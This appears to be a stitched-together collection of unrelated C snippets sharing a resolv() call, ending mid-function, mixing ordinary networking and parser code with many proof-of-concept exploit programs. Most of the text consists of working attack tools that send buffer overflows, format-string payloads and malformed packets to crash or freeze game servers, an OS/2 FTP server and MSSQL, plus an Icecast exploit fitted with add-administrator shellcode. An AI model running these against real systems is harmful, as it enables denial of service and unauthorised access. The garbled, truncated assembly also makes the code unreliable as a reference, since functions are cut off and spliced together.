int eval_expr(char *str)
{
int i;
char **tabstring;
t_list *op;
t_list *nb;
op = 0;
nb = 0;
i = 0;
tabstring = str_to_tab_string(str);
show_tab_string(tabstring);
my_putstr("\n");
while (tabstring[i] != 0)
{
if (is_operator(tabstring[i]) == 3)//si '(' on empile le retour de pqrenthesis mode
my_put_in_list(&nb, parenthesis_mode(&i, tabstring));
if (is_operator(tabstring[i]) == 0)// si nombre on empile
my_put_in_list(&nb, tabstring[i]);
if (is_operator(tabstring[i]) == 1)//si operateur de basse priorite on empile
my_put_in_list(&op, tabstring[i]);
if (is_operator(tabstring[i]) == 2)// si operqteur de priorite on resolv
resolv(&i, tabstring, &op, &nb);
i = i + 1;
}
return (depile_all(op, nb));
}
char *eval_expr(char *base, char *operators, char *expr, int size)
{
char **tabexpr;
t_list *op;
t_list *nb;
int i;
tabexpr = str_to_tab_string(base, expr, operators);
op = 0;
nb = 0;
i = 0;
while (tabexpr[i] != 0)
{
if (is_open_parent(operators, tabexpr[i]) == 1)
my_put_in_list(&nb, parenthesis_mode(base, operators, &i, tabexpr));
if (is_num(base, operators, tabexpr[i]) == 1)
my_put_in_list(&nb, tabexpr[i]);
if (is_low_op(operators, tabexpr[i]) == 1)
my_put_in_list(&op, tabexpr[i]);
if (is_high_op(operators, tabexpr[i]) == 1)
resolv(base, operators, &i, tabexpr, &op, &nb);
i = i + 1;
}
return (depile_all(base, operators, op, nb));
}
int eval_expr(char *str)
{
int i;
char **tabstring;
t_list *op;
t_list *nb;
op = 0;
nb = 0;
i = 0;
tabstring = str_to_tab_string(str);
while (tabstring[i] != 0)
{
if (is_operator(tabstring[i]) == 3)
my_put_in_list(&nb, parenthesis_mode(&i, tabstring));
if (is_operator(tabstring[i]) == 0)
my_put_in_list(&nb, tabstring[i]);
if (is_operator(tabstring[i]) == 1)
my_put_in_list(&op, tabstring[i]);
if (is_operator(tabstring[i]) == 2)
resolv(&i, tabstring, &op, &nb);
i = i + 1;
}
return (depile_all(op, nb));
}
testifhostisalive(char *host, int port)
{
struct sockaddr_in addr;
int s;
char c;
s = socket (AF_INET, SOCK_STREAM, 0);
addr.sin_family = AF_INET;
addr.sin_addr = resolv (host);
addr.sin_port = htons (port);
if(connect (s, (struct sockaddr *) &addr, sizeof (addr))==0)
{
printf("System on the other side is patched ===> Good\n");
return;
}
else
{
printf("System on the other side is NOT patched ===> Bad\n");
printf("Fix:\n");
printf(" In case you are using a version prior to 4.3, please contact IBM support for");
printf(" further assistance.\n");
printf("If you are using v4.3, you can get the patch at the following URL:\n");
printf("ftp://ftp.software.ibm.com/ps/products/tcpip/fixes/v4.3os2/ic27721/\n");
printf("Vendor URL: http://www.ibm.com\n");
printf("Product URL: http://www.ibm.com/software/os/warp/\n");
}
return;
}
bool ValidateDnsServer(ServerConfig* conf, const char*, const char*, ValueItem &data)
{
if (!*(data.GetString()))
{
std::string nameserver;
// attempt to look up their nameserver from /etc/resolv.conf
conf->GetInstance()->Log(DEFAULT,"WARNING: <dns:server> not defined, attempting to find working server in /etc/resolv.conf...");
ifstream resolv("/etc/resolv.conf");
bool found_server = false;
if (resolv.is_open())
{
while (resolv >> nameserver)
{
if ((nameserver == "nameserver") && (!found_server))
{
resolv >> nameserver;
data.Set(nameserver.c_str());
found_server = true;
conf->GetInstance()->Log(DEFAULT,"<dns:server> set to '%s' as first resolver in /etc/resolv.conf.",nameserver.c_str());
}
}
if (!found_server)
{
conf->GetInstance()->Log(DEFAULT,"/etc/resolv.conf contains no viable nameserver entries! Defaulting to nameserver '127.0.0.1'!");
data.Set("127.0.0.1");
}
}
bool chat_client_connect() {
getplayername();
if (!ircThreadInstance) {
ircThreadInstance = new irc_thread__parm();
}
int temporarySocket = tcpsocket();
struct sockaddr_in addr;
memset(&addr, 0, sizeof(addr));
int ip = resolv(Form1->getChatHost().c_str());
addr.sin_addr.s_addr = ip;
addr.sin_port = htons(Form1->getChatPort());
addr.sin_family = AF_INET;
int connectRes = connect(temporarySocket, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
if( connectRes >= 0 && temporarySocket) {
ircThreadInstance->sd = temporarySocket;
CreateThread(0, 0, irc_ThreadProc, ircThreadInstance, 0, 0);
if (!rReconnectWatchThread_started) {
rReconnectWatchThread_started = 1;
CreateThread(0, 0, irc_ThreadProc_ReconnectWatchThread, 0, 0, 0);
}
return true;
} else {
closesocket(temporarySocket);
}
return false;
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd;
u_short port = PORT;
u_char *buff;
setbuf(stdout, NULL);
fputs("\n"
"Pigeon server <= 3.02.0143 freeze "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\nUsage: %s <server> [port(%d)]\n"
"\n", argv[0], PORT);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("\n- target %s:%hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
buff = malloc(BUFFSZ);
if(!buff) std_err();
memset(buff, 'a', BUFFSZ);
buff[BUFFSZ - 5] = '|';
buff[BUFFSZ - 4] = '|';
buff[BUFFSZ - 3] = '1';
buff[BUFFSZ - 2] = '|';
buff[BUFFSZ - 1] = '|';
fputs("- send malformed data\n", stdout);
if(send(sd, buff, BUFFSZ, 0)
< 0) std_err();
close(sd);
fputs("- the server should be freezed, check it manually\n\n", stdout);
return(0);
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd;
u_short port = PORT;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"Chris Moneymaker's World Poker Championship 1.0 buffer-overflow "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%d)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
fputs("- check server: ", stdout);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nError: server doesn't seem to work, I have received no data\n\n", stdout);
exit(1);
}
fputs("ok\n", stdout);
fputs("- send malformed data size\n", stdout);
send_chmpoker(sd, BOF, sizeof(BOF) - 1, 8, 3);
sleep(ONESEC);
close(sd);
fputs("- the server should be crashed, check it manually\n", stdout);
return(0);
}
static int tftp_probe(struct device_d *dev)
{
struct fs_device_d *fsdev = dev_to_fs_device(dev);
struct tftp_priv *priv = xzalloc(sizeof(struct tftp_priv));
dev->priv = priv;
priv->server = resolv(fsdev->backingstore);
return 0;
}
void FreeWebChatPoC( char *host, int port ){
struct sockaddr_in peer;
int sd,
err;
peer.sin_addr.s_addr = resolv(host);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
char *buff = (char *)malloc(513);
fprintf(
stdout,
"\nConnecting to: %s:%hu\n\n",
inet_ntoa(peer.sin_addr),
port
);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0){
perror("Error");
exit(-1);
}
err = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
if(err < 0){
perror("Error");
exit(-1);
}
err = recv(sd, buff, 512, 0);
if(err < 0){
perror("Error");
exit(-1);
}
#ifdef WIN32
closesocket(sd);
#else
close(sd);
#endif
free(buff);
fprintf(
stdout,
"\nFree_Web_Chat - DoS - Proof_Of_Concept terminated.\n\n"
);
}
int
fstat(int fd, struct stat *buf)
{
int r;
static int (*ofstat) (int, struct stat *)= 0;
D;
resolv((void **)&ofstat, "fstat" SUF);
nested++;
r = ofstat(fd, buf);
if (!r && nested == 1)
fdemit('q', fd);
nested--;
DD;
return r;
}
int
stat(const char *p, struct stat *buf)
{
int r;
static int (*ostat) (const char *restrict, struct stat *restrict)= 0;
DP;
resolv((void **)&ostat, "stat" SUF);
nested++;
r = ostat(p, buf);
if (!r && nested == 1)
emit('q', p);
nested--;
DD;
return r;
}
static int do_host(int argc, char *argv[])
{
IPaddr_t ip;
if (argc != 2)
return COMMAND_ERROR_USAGE;
ip = resolv(argv[1]);
if (!ip)
printf("unknown host %s\n", argv[1]);
else {
printf("%s is at ", argv[1]);
print_IPaddr(ip);
printf("\n");
}
return 0;
}
main (int argc, char *argv[])
{
struct sockaddr_in addr;
int i, s;
char c;
int port = 21;
printf("Systems Affected:\n
- OS/2 Warp 4.5 FTP server V4.0/4.2
- OS/2 Warp 4.5 FTP server V4.3
- Probably other versions of the software as well.\n");
printf ("\n");
if (argc < 2)
{
printf ("Usage : %s <host> [port]\n", argv[0]);
exit (0);
}
if (argc == 3)
port = atoi (argv[2]);
s = socket (AF_INET, SOCK_STREAM, 0);
addr.sin_family = AF_INET;
addr.sin_addr = resolv (argv[1]);
addr.sin_port = htons (port);
connect (s, (struct sockaddr *) &addr, sizeof (addr));
write (s, "USER ", 5);
for (i = 1; i <= 1000; i++)
{
write (s, "a", 1);
}
write (s, "\n", 1);
write (s, "PASS ", 5);
for (i = 1; i <= 100; i++)
{
write (s, "a", 1);
}
write (s, "\n", 1);
read (s, &c, 1);
printf("Done sending malicious connection...\n");
printf("Testing if host was patched or not...\n");
testifhostisalive(argv[1],port);
}
string LookUp::lookup(const string& ip)
{
//search in chache first ...
if(HostRec *hr = ip_cache_lookup(ip))
return hr->hostname;
if(ip_failed_lookup(ip))
return string();
//... nothing there, do lookup and add it to the cache
HostRec hr; hr.ip = ip;
hr.hostname = resolv(ip);
if(hr.hostname.empty())
failed.push_back(hr.ip);
else
hc.push_back(hr);
return hr.hostname;
}
static void dhcp_options_process(unsigned char *popt, struct bootp *bp)
{
unsigned char *end = popt + sizeof(*bp) + OPT_SIZE;
int oplen;
unsigned char option;
int i;
while (popt < end && *popt != 0xff) {
oplen = *(popt + 1);
option = *popt;
i = dhcp_options_handle(option, popt + 2, oplen, bp);
if (i == ARRAY_SIZE(dhcp_options))
debug("*** Unhandled DHCP Option in OFFER/ACK: %d\n", option);
popt += oplen + 2; /* Process next option */
}
if (dhcp_tftpname[0] != 0)
net_set_serverip(resolv(dhcp_tftpname));
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len,
attack;
u_short port = PORT;
u_char numplayers[12],
password[256],
version[16],
pversion[16],
username[17],
*connmsg = "ComsConnectMessage",
*uid,
*buff,
*pck,
*msg,
*p,
*l;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"Scorched 3D <= 39.1 (bf) multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attacks:\n"
"1 = format string and buffer-overflow in addLine and SendString*\n"
" (this PoC tests only the format string for simplicity\n"
"2 = server freeze through negative numplayers\n"
" if server is protected with password you need to know the keyword\n"
"3 = ComsMessageHandler buffer-overflow\n"
"4 = various crashes and possible code execution in Logger.cpp\n"
" if server is protected with password you need to know the keyword\n"
"\n", argv[0], port);
exit(1);
}
attack = atoi(argv[1]);
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port + 1);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
buff = malloc(BUFFSZ + 1);
pck = malloc(BUFFSZ + 1);
if(!buff || !pck) std_err();
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer));
if(!timeout(sd)) {
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
if(len < 0) std_err();
buff[len] = 0;
scorched3d_info(buff, version, pversion);
printf("- set version %s (%s)\n", version, pversion);
} else {
strcpy(version, "39.1");
strcpy(pversion, "bf");
}
close(sd);
fputs(
"- if you lost the connection probably the server is vulnerable\n"
"- start attack:\n", stdout);
uid = "";
strcpy(numplayers, "1");
password[0] = 0;
switch(attack) {
case 1: connmsg = "%n%n%n%n%n"; break;
case 2: strcpy(numplayers, "-1"); break;
case 3: connmsg = do_it_big(BOFSZ); break;
case 4: uid = do_it_big(BOOMSZ); break;
default: {
printf("\nError: the attack %d is not available\n\n", attack);
exit(1);
} break;
}
peer.sin_port = htons(port);
for(;;) { // password handling
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
sprintf(username, "%lx", time(NULL));
len = scorched3d_build_pck(pck,
connmsg,
"host", "Linux",
"numplayers", numplayers,
"password", password,
"pversion", pversion,
"uid", uid,
"username", username,
"version", version,
NULL);
scorched3d_send(sd, pck, len, buff, BUFFSZ);
if(timeout(sd) < 0) {
fputs("\nError: socket timeout, the server has not replied to our request\n", stdout);
exit(1);
}
len = scorched3d_recv(sd, pck, BUFFSZ, buff, BUFFSZ);
if(!strcmp(buff, "ComsTextMessage")) {
msg = buff + 16;
if(strstr(msg, "password")) {
fputs("- server protected, insert the right password:\n ", stdout);
fflush(stdin);
fgets(password, sizeof(password), stdin);
for(p = password; *p > '\r'; p++);
*p = 0;
close(sd);
continue;
} else if(strstr(msg, "version")) {
p = strstr(msg, VERTAG);
if(!p) {
printf("\nError: no version found in the message:\n%s\n", msg);
exit(1);
}
p += sizeof(VERTAG) - 1;
l = strchr(p, '(');
if(l) *(l - 1) = 0;
strcpy(version, p);
p = l + 1;
l = strchr(p, ')');
if(l) *l = 0;
strcpy(pversion, p);
printf("- set version %s (%s)\n", version, pversion);
close(sd);
continue;
}
printf("%s\n", buff + 16);
exit(1);
}
close(sd);
break;
}
return(0);
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd;
u_short port = PORT;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"Netpanzer <= 0.8 endless loop "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%d)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
fputs("- check server: ", stdout);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nError: server doesn't seem to work, I have received no data\n\n", stdout);
exit(1);
} else {
fputs("ok\n", stdout);
}
fputs("- send malformed data size\n", stdout);
if(send(sd, "\x00\x00", 2, 0)
<= 0) std_err();
close(sd);
fputs("- check server status:\n", stdout);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ],
info[] =
"\x7f"
"\x01\x00"
"\x00\x07",
pck[] =
"\x7f"
"\x00\x00"
"\x00\x00"
"\x00",
*p;
setbuf(stdout, NULL);
fputs("\n"
"Scrapland <= 1.0 server termination "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%d)]\n"
"\n"
"Attack:\n"
" 1 = big text string (size>SSize)\n"
" 2 = unexistent models (you can test this bug also modifying scrap.cfg)\n"
" 3 = newpos<=size\n"
" 4 = partial packet after small packet (1 or 2 bytes)\n"
"\n", argv[0], port);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
fputs("- request informations\n", stdout);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
SEND(info, sizeof(info) - 1);
RECV;
printf("\n Server name %s\n", buff + 10);
printf(" Players %d / %d\n\n",
*(u_short *)(buff + 8), *(u_short *)(buff + 6));
if(*(u_short *)(buff + 8) == *(u_short *)(buff + 6)) {
fputs("- Alert: the server is full so this attack will fail\n\n", stdout);
}
fputs("- send BOOM packet\n", stdout);
switch(atoi(argv[1])) {
case 1: {
pck[5] = 0xff; // major than 0x7f
*(u_short *)(pck + 1) = sizeof(pck) - 4;
SEND(pck, sizeof(pck) - 1);
} break;
case 2: {
p = buff;
*p++ = 0x7f;
p += 2; // data size
ADDSHORT(0); // don't know, pck related?
ADDTEXT("Unnamed Player"); // PlayerName
ADDTEXT("unexistent"); // PlayerModel
ADDSHORT(65); // PlayerMaxLife
ADDTEXT("unexistent"); // PilotModel
ADDTEXT("unexistent"); // Motor0Model
ADDTEXT("unexistent"); // Motor1Model
ADDTEXT("unexistent"); // Motor2Model
ADDTEXT("unexistent"); // Motor3Model
ADDTEXT("1,3,0,0,1,0,1"); // WeaponBayList
ADDLONG(0); // PlayerTeamID
*(u_short *)(buff + 1) = (p - buff) - 3;
SEND(buff, p - buff);
} break;
case 3: {
*(u_short *)(pck + 1) = 1; // major than 0
SEND(pck, 5);
} break;
case 4: {
SEND(pck, 1);
sleep(ONESEC);
*(u_short *)(pck + 1) = 0;
SEND(pck, 3);
} break;
default: {
fputs("\nError: wrong attack selected\n\n", stdout);
exit(1);
}
}
fputs("- check server:\n", stdout);
SEND(info, sizeof(info) - 1);
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char *buff,
query[] =
"\xfe\xfd\x00\x00\x00\x00\x00\xff\x00\x00";
setbuf(stdout, NULL);
fputs("\n"
"Breed <= patch #1 zero-length crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%d)]\n"
"\n", argv[0], port);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
buff = malloc(BUFFSZ + 1);
if(!buff) std_err();
fputs("- request informations:\n", stdout);
*(u_long *)(query + 3) = time(NULL) ^ 0x12345678;
SEND(query);
RECV;
show_info(buff, len);
fputs("- send zero-length packet\n", stdout);
SEND("");
sleep(ONESEC);
fputs("- check server:\n", stdout);
*(u_long *)(query + 3) = time(NULL) ^ 0x87654321;
SEND(query);
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd;
u_short port = PORT;
u_char buff[BUFFSZ];
setbuf(stdout, NULL);
fputs("\n"
"Icecast <= 2.0.1 Win32 remote code execution "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"*************************************\n"
"SHELLCODE ADDED BY LORDKAOZ\n"
"OF #IMPERATORI\n"
"*************************************\n"
"SHELLCODE BASED ON WIN32_ADDUSER\n"
"BY METASPLOIT GROUP\n"
"*************************************\n"
"\n", stdout);
if(argc < 2) {
printf("\nUsage: %s <server> [port(%d)]\n"
"\n"
"THiS iS A POC EXPLOIT BY Luigi Auriemma\n"
"AND MODDED BY LORDKAOZ WITH AN ADMINISTRATOR X/X ADDUSER\n"
"BASED ON METASPLOIT SHELLCODE\n"
"\n", argv[0], PORT);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("\n- target %s:%hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
fputs("- send malformed data\n", stdout);
if(send(sd, EXEC, sizeof(EXEC) - 1, 0)
< 0) std_err();
if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) {
fputs("\nThe Server Is Vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer Doesn't Seem To Be Vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
if (argc!=3) {
printf(" MSSQL denial of service\n");
printf(" by securma massine\n");
printf("Cet outil a ete cree pour test ,je ne suis en aucun cas
responsable des degats que vous pouvez en faire\n");
printf("Syntaxe: MSSQLdos <ip> <port>\n");
exit(1);
}
WSAStartup(0x101,&WinsockData);
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
ZeroMemory(&vulh,sizeof(vulh));
vulh.sin_family=AF_INET;
vulh.sin_addr.s_addr=resolv(argv[1]);
vulh.sin_port=htons(atoi(argv[2]));
if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) {
printf("Impossible de se connecter...le port est en generale 1433...\n");
exit(1);
}
{
send(s,buffer,sizeof(buffer),0);
printf("Data envoyes...\n");
}
printf("\nattendez quelques secondes et verifiez que le serveur ne
repond plus.\n");
closesocket(s);
WSACleanup();
static int do_dhcp(int argc, char *argv[])
{
int ret, opt;
int retries = DHCP_DEFAULT_RETRY;
dhcp_reset_env();
getenv_uint("global.dhcp.retries", &retries);
while((opt = getopt(argc, argv, "H:v:c:u:U:r:")) > 0) {
switch(opt) {
case 'H':
dhcp_set_param_data(DHCP_HOSTNAME, optarg);
break;
case 'v':
dhcp_set_param_data(DHCP_VENDOR_ID, optarg);
break;
case 'c':
dhcp_set_param_data(DHCP_CLIENT_ID, optarg);
break;
case 'u':
dhcp_set_param_data(DHCP_CLIENT_UUID, optarg);
break;
case 'U':
dhcp_set_param_data(DHCP_USER_CLASS, optarg);
break;
case 'r':
retries = simple_strtoul(optarg, NULL, 10);
break;
}
}
if (!retries) {
printf("retries is set to zero, set it to %d\n", DHCP_DEFAULT_RETRY);
retries = DHCP_DEFAULT_RETRY;
}
dhcp_con = net_udp_new(0xffffffff, PORT_BOOTPS, dhcp_handler, NULL);
if (IS_ERR(dhcp_con)) {
ret = PTR_ERR(dhcp_con);
goto out;
}
ret = net_udp_bind(dhcp_con, PORT_BOOTPC);
if (ret)
goto out1;
net_set_ip(0);
dhcp_start = get_time_ns();
ret = bootp_request(); /* Basically same as BOOTP */
if (ret)
goto out1;
while (dhcp_state != BOUND) {
if (ctrlc()) {
ret = -EINTR;
goto out1;
}
if (!retries) {
ret = -ETIMEDOUT;
goto out1;
}
net_poll();
if (is_timeout(dhcp_start, 3 * SECOND)) {
dhcp_start = get_time_ns();
printf("T ");
ret = bootp_request();
/* no need to check if retries > 0 as we check if != 0 */
retries--;
if (ret)
goto out1;
}
}
if (dhcp_tftpname[0] != 0) {
IPaddr_t tftpserver = resolv(dhcp_tftpname);
if (tftpserver)
net_set_serverip(tftpserver);
}
out1:
net_unregister(dhcp_con);
out:
if (ret)
printf("dhcp failed: %s\n", strerror(-ret));
return ret;
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ],
*p;
setbuf(stdout, NULL);
fputs("\n"
"Lords of the Realm III <= 1.01 server crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <server> [port(%d)]\n"
"\n", argv[0], PORT);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
printf("- target %s:%hu\n",
inet_ntoa(peer.sin_addr), port);
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(recv(sd, buff, BUFFSZ, 0)
< 0) std_err();
fputs("- informations:\n", stdout);
if(*buff != 11) {
p = buff + 5;
SHOW(" Server*Admin: ");
p += 2;
SHOW(" Map: ");
} else {
p = buff + 24;
SHOW(" Admin nick: ");
}
*(u_long *)buff = BUFFSZ - 4;
memcpy(buff + 4, "\x79\xff\xff\xff\xff", 5);
*(u_long *)(buff + 9) = (BUFFSZ - 14) >> 1;
memset(buff + 13, 'a', BUFFSZ - 14);
buff[BUFFSZ - 1] = 0x45;
fputs("\n- send BOOM data\n", stdout);
if(send(sd, buff, BUFFSZ, 0)
< 0) std_err();
if(recv(sd, buff, BUFFSZ, 0) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem to be vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len,
attack,
tmp,
autoport = 1;
u_short port = PORT;
u_char *buff,
info[] =
"Y_NET_YAGER_CLIENT\0"
"\x00\x00" "\x00\x00",
*p;
struct yager_head {
u_long type;
u_short size;
u_short pck1;
u_short pck2;
} *yh;
setbuf(stdout, NULL);
fputs("\n"
"Yager <= 5.24 multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(auto)]\n"
"\n"
"Attacks:\n"
" 1 = nickname buffer-overflow\n"
" 2 = big data buffer-overflow\n"
" 3 = freeze of server and connected clients\n"
" 4 = crash using type 0x1d (in 0x0050e970)\n"
" 5 = crash using type 0x22 (in 0x004fd2b8)\n"
" 6 = crash using type 0x24 (in 0x004fd2f5)\n"
" 7 = crash using type 0x28 (in 0x004b0f1b)\n"
"\n", argv[0]);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 3) {
autoport = 0;
port = atoi(argv[3]);
}
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
buff = malloc(BUFFSZ);
if(!buff) std_err();
if(autoport) {
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
fputs("- request informations:\n", stdout);
*(u_short *)(info + 19) = ~time(NULL);
SENDTO(info);
RECVFROM;
close(sd);
p = buff + 19;
port = ntohs(*(u_short *)p);
printf("\n Server port %d\n", port);
p += 2;
SHOW(" Map ");
printf(" Version %d.%d\n", p[1], p[0]);
p += 2;
SHOW(" Server name ");
p += 4;
printf(" Players %d / %d\n\n", p[1], p[0]);
peer.sin_port = htons(port);
}
attack = atoi(argv[1]);
if(attack > 7) {
fputs("\nError: you have chosen a wrong attack number\n\n", stdout);
exit(1);
}
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
yh = (struct yager_head *)buff;
yh->pck1 = tmp = ~time(NULL) & 0xffff;
yh->pck2 = 0;
if(attack == 1) {
yh->type = 0x1e;
memcpy(buff + HEADSZ, NICKBOF, sizeof(NICKBOF) - 1);
yh->size = sizeof(NICKBOF) - 1;
fputs("- send long data block for nickname buffer-overflow\n", stdout);
} else if(attack == 2) {
yh->type = 0x00; // almost any other type is ok
memcpy(buff + HEADSZ, PCKBOF, sizeof(PCKBOF) - 1);
yh->size = sizeof(PCKBOF) - 1;
fputs("- send long data block for packet buffer-overflow\n", stdout);
} else if(attack == 3) {
yh->type = 0x1b;
yh->size = 0;
